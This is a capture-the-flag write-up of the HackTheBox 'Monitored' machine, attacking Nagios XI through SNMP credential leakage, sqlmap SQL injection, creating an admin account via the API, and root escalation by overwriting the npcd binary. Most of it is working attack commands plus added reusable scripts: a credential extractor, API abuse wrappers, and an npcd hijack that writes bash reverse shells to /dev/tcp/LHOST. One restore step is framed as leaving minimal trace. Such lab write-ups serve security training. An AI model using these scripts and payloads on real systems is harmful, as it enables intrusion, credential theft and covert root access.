HackTheBox Nagios SNMP SQLi API Abuse
HTB - Monitored
Exploitation of Nagios XI via SNMP recon, SQL injection, admin user creation through the API, and privilege escalation via the npcd service.
2024-03-10 Hard HackTheBox
Reconnaissance
# /etc/hosts
10.10.11.248 nagios.monitored.htb
nmap -p- --open -sV -v 10.10.11.248
Open ports:
- 22/tcp — SSH OpenSSH 8.4p1 Debian
- 80/tcp — HTTP Apache httpd 2.4.56
- 389/tcp — LDAP OpenLDAP
- 443/tcp — HTTPS Apache httpd 2.4.56
- 5667/tcp — tcpwrapped
LDAP & SNMP Enumeration
# -x: anonymous simple bind (without it ldapsearch attempts a SASL bind and fails)
ldapsearch -x -H ldap://nagios.monitored.htb:389
nmap -p 161 --open -sU -v 10.10.11.248
snmpbulkwalk -c public -v2c 10.10.11.248 .
Credentials exposed in the SNMP walk output: svc:XjH7VCehowpR1xZB
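The credential leak above is the usual one for SNMP on Linux: HOST-RESOURCES-MIB publishes each process's argument vector (hrSWRunParameters), so any script that passes a password on its command line hands it to whoever knows the read community string. The following is an added example, not code from the original writeup: two small filters that sift a walk dump for that pattern. SAMPLE_WALK is constructed for this example (it is not the captured output from the box); the svc credential is the one the writeup reports.

```shell
#!/bin/sh
# Added example, not part of the original writeup. On Linux hosts, HOST-RESOURCES-MIB
# exposes every process's argument vector (hrSWRunParameters), so a cron job or
# wrapper that passes a password on the command line leaks it to anyone who knows
# the read community string. These functions sift an snmpwalk/snmpbulkwalk dump for
# that pattern. SAMPLE_WALK is constructed for this example, not captured from the box.

SAMPLE_WALK='HOST-RESOURCES-MIB::hrSWRunName.1 = STRING: "systemd"
HOST-RESOURCES-MIB::hrSWRunParameters.1 = STRING: "--system --deserialize 31"
HOST-RESOURCES-MIB::hrSWRunParameters.722 = STRING: "/usr/sbin/apache2 -k start"
HOST-RESOURCES-MIB::hrSWRunParameters.1518 = STRING: "-c sleep 30; /usr/bin/snmpwalk -v 3 -l authPriv -u svc -a SHA -A XjH7VCehowpR1xZB -x AES -X XjH7VCehowpR1xZB 127.0.0.1"
HOST-RESOURCES-MIB::hrSWRunParameters.1600 = STRING: "/usr/sbin/sshd -D"'

# Print the argument vectors (walk output on stdin) that carry a password-style flag.
suspicious_cmdlines() {
    grep 'hrSWRunParameters' |
        sed 's/^.*= STRING: "\(.*\)"$/\1/' |
        grep -E -- '(-A |-X |--password|passw(or)?d=)'
}

# For net-snmp v3 style invocations (-u USER ... -A AUTHPASS), print USER:AUTHPASS.
snmpv3_creds() {
    suspicious_cmdlines | sed -n 's/.*-u \([^ ]*\).* -A \([^ ]*\).*/\1:\2/p'
}

# Demo on the constructed sample. Against a live target, pipe the walk in instead:
#   snmpbulkwalk -c public -v2c 10.10.11.248 . | snmpv3_creds
printf '%s\n' "$SAMPLE_WALK" | snmpv3_creds
```

The first filter is deliberately loose (it will flag any `-A`, `-X`, `--password` or `password=` argument) so that nothing is missed on a noisy host; the second only understands the net-snmp v3 flag layout, which is the case that matters on this box.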
Nagios XI Enumeration
ffuf -u https://nagios.monitored.htb/nagiosxi/FUZZ -w wordlists/dicc.txt -mc 0-299 -fs 0
Discovered endpoints:
- api/v1/ — REST API
- api/v1/authenticate — Authentication
- backend/ — Admin backend
- terminal — Shell In A Box
API Authentication
curl -XPOST -k -L \
'https://nagios.monitored.htb/nagiosxi/api/v1/authenticate?pretty=1' \
-d 'username=svc&password=XjH7VCehowpR1xZB&valid_min=60'
Exploitation — SQL Injection
sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3" \
--cookie="nagiosxi=..." --method POST --dump --technique=ET \
--dbms=MySQL -p id --risk=3 --level=5 --threads=10
Admin API key extracted from the dump: IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL
Creating an admin user
# -X POST: curl parses "-POST" as its FTP port option -P, not as a request method
curl -X POST -k \
"https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1" \
-d "username=nadmin&password=nadmin&name=nadmin&email=newadmin@monitored.htb&auth_level=admin"
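Both API calls, as an added example that is not part of the original writeup: the two curl requests wrapped in functions (with `-X POST` spelled out, since curl reads `-POST` as the FTP port option `-P`) plus sed-based parsing of the responses so no JSON tooling is needed on the attacking host. HOST and the account details come from the writeup. The response shapes the parsers expect (`{"auth_token":...}` on authenticate, `{"success":...}` or `{"error":...}` on user creation) and the `force_pass_change=0` parameter are assumptions about the Nagios XI API, labelled as such in the code.

```shell
#!/bin/sh
# Added example, not part of the original writeup: the two API calls as functions,
# with curl invoked as -X POST (the writeup's "-POST" is parsed by curl as the FTP
# port option -P) and the responses handled with sed so nothing beyond curl is needed.
# HOST and the account details come from the writeup; the response shapes used in the
# parsers are assumed from Nagios XI's API ({"auth_token":...}, {"success":...}/{"error":...}).

HOST="https://nagios.monitored.htb"

# Extract one string-valued key from a flat JSON object on stdin.
json_str() {  # json_str KEY
    sed -n "s/.*\"$1\":\"\([^\"]*\)\".*/\1/p"
}

# True when an XI API response reports success rather than an "error" object.
api_ok() {
    grep -q '"success"'
}

# Authenticate as a user and print the session token (valid_min defaults to 60).
api_authenticate() {  # USER PASS [VALID_MIN]
    curl -sk -X POST "$HOST/nagiosxi/api/v1/authenticate" \
        -d "username=$1&password=$2&valid_min=${3:-60}" | json_str auth_token
}

# Create a user through system/user with the given auth level.
# force_pass_change=0 is added so the new account is not sent to a password-change
# page on first login (assumed parameter name; drop it if the API rejects it).
api_add_user() {  # APIKEY USERNAME PASSWORD AUTH_LEVEL
    curl -sk -X POST "$HOST/nagiosxi/api/v1/system/user?apikey=$1" \
        -d "username=$2&password=$3&name=$2&email=$2@monitored.htb&auth_level=$4&force_pass_change=0"
}

# Usage:
#   sh nagios_api.sh auth svc XjH7VCehowpR1xZB
#   sh nagios_api.sh adduser <APIKEY> nadmin nadmin admin
case "${1:-}" in
    auth)
        api_authenticate "$2" "$3" ;;
    adduser)
        resp=$(api_add_user "$2" "$3" "$4" "$5")
        printf '%s\n' "$resp"
        printf '%s\n' "$resp" | api_ok || exit 1 ;;
esac
```

The `adduser` branch echoes the raw response before judging it, so an `{"error":...}` body (bad API key, duplicate username) is visible rather than silently turning into a non-zero exit.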
Reverse Shell via Nagios Component
nc -nlvp 4444
# Command execution via the CCM (Core Config Manager): the payload below is saved as a check command and fired by running the check
bash -c 'bash -i >& /dev/tcp/LHOST/4444 0>&1'
Privilege Escalation — npcd service
python3 -c 'import pty;pty.spawn("/bin/bash")'
echo '#!/bin/bash' > /usr/local/nagios/bin/npcd
echo 'bash -i >& /dev/tcp/LHOST/4445 0>&1' >> /usr/local/nagios/bin/npcd
chmod +x /usr/local/nagios/bin/npcd
sudo /usr/local/nagiosxi/scripts/manage_services.sh restart npcd
cat /root/root.txt
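The escalation above works because the npcd binary is writable by the shell's user while the sudo rule lets that user restart the service as root (confirm both with `ls -l /usr/local/nagios/bin/npcd` and `sudo -l` before overwriting anything). The following is an added example, not code from the original writeup: the same hijack as a function that refuses to run when the binary is not writable, keeps a copy of the real binary so npcd can be put back afterwards, and writes the reverse-shell stub. The npcd path and the manage_services.sh sudo rule are taken from the writeup; the backup location under /tmp, the script name `npcd_hijack.sh` and the LHOST/LPORT arguments are choices made for this example.

```shell
#!/bin/sh
# Added example, not part of the original writeup: the npcd hijack as a function that
# checks the binary is writable, keeps a copy of the real binary so the service can be
# restored afterwards, and writes the reverse-shell stub. The npcd path and the sudo
# rule on manage_services.sh come from the writeup; the backup location under /tmp is
# a choice made here because the nagios user may not be able to create files next to
# the binary (cp onto an existing file only needs write access to the file itself).

NPCD_BIN="${NPCD_BIN:-/usr/local/nagios/bin/npcd}"
NPCD_BACKUP="${NPCD_BACKUP:-/tmp/npcd.orig}"

# hijack_npcd BIN LHOST LPORT [BACKUP]: back BIN up, then overwrite it with a
# bash reverse shell to LHOST:LPORT. Returns 1 if BIN is missing or not writable.
hijack_npcd() {
    bin=$1; lhost=$2; lport=$3; backup=${4:-$NPCD_BACKUP}
    [ -f "$bin" ] && [ -w "$bin" ] || { echo "cannot write $bin" >&2; return 1; }
    [ -e "$backup" ] || cp -p "$bin" "$backup"
    printf '#!/bin/bash\nbash -i >& /dev/tcp/%s/%s 0>&1\n' "$lhost" "$lport" > "$bin"
    chmod +x "$bin"
}

# restore_npcd BIN [BACKUP]: write the saved binary back over BIN in place.
restore_npcd() {
    bin=$1; backup=${2:-$NPCD_BACKUP}
    [ -f "$backup" ] && cp "$backup" "$bin"
}

# Usage: start `nc -nlvp 4445` on LHOST first, then:
#   sh npcd_hijack.sh LHOST 4445
# and trigger the restart the sudo rule allows:
#   sudo /usr/local/nagiosxi/scripts/manage_services.sh restart npcd
if [ $# -eq 2 ]; then
    hijack_npcd "$NPCD_BIN" "$1" "$2" && echo "payload written to $NPCD_BIN, backup in $NPCD_BACKUP"
fi
```

Once the root shell is in, `restore_npcd /usr/local/nagios/bin/npcd` followed by another restart puts the real daemon back, so the performance-data pipeline keeps working and the only trace left is the backup under /tmp.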